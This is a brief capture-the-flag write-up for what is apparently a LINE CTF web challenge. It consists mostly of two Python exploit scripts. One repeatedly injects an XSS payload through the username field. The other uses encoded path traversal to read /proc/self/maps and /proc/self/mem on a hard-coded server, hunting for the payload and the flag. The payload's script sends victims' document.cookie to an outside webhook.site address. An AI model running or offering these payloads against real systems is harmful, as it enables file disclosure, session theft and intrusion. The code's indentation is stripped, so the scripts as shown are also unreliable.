We can save the payload in the username or somewhere and then execute it with reading /proc/self/mem Run both of the scripts and the same time. One of them inject payloads and the other one search for it. Since we are reading the memory, some links that the script outputs might expire.
#!/usr/bin/env python3
import requests
# target = 'http://localhost:8002'
target = 'http://35.243.100.112'
# target = 'http://localhost:10100'
payload = 'jeeezjeeez<img src="https://webhook.site/XXXX?worked=1"><script>fetch("https://webhook.site/XXXX",{method:"POST",body:document.cookie,mode:"no-cors"})</script>'
# requests.post(f"{target}/identify",headers={'content-type':'application/x-www-form-urlencoded'},data='username='+payload)
r = ""
for i in range(5):
r += requests.get(f"{target}/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fself%2fmaps/{1000*i}/{1000*(i+1) }").text[56:]
r = r.split("\n")
heapbase = -1
heapend = -1
for z in r:
if('heap' in z):
heapbase,heapend = z.split(' ')[0].split('-')
try:
heapbase = int(heapbase,16)
heapend = int(heapend,16)
while(1):
for i in range(13,(heapend - heapbase)//(1024 * 256)+1):
r = requests.get(f"{target}/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fself%2fmem/{heapbase+i*(1024*256)}/{heapbase+(i+1)*(1024*256)}")
if(payload in r.text):
q = heapbase+i*(1024*256)+r.text.index(payload)
print(i,f"{target}/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fself%2fmem/{q}/{q+1000}")
# print(r[r.index(b'lmaofuck'):r.index(b'lmaofuck')+100])
if('LINECTF' in r.text):
print(r.text)
print('NO')
except:
pass
#!/usr/bin/env python3
import requests
while(1):
target = 'http://35.243.100.112'
payload = 'jeeezjeeez<img src="https://webhook.site/XXXX?worked=1"><script>fetch("https://webhook.site/XXXX",{method:"POST",body:document.cookie,mode:"no-cors"})</script>'
requests.post(f"{target}/identify",headers={'content-type':'application/x-www-form-urlencoded'},data='username='+payload)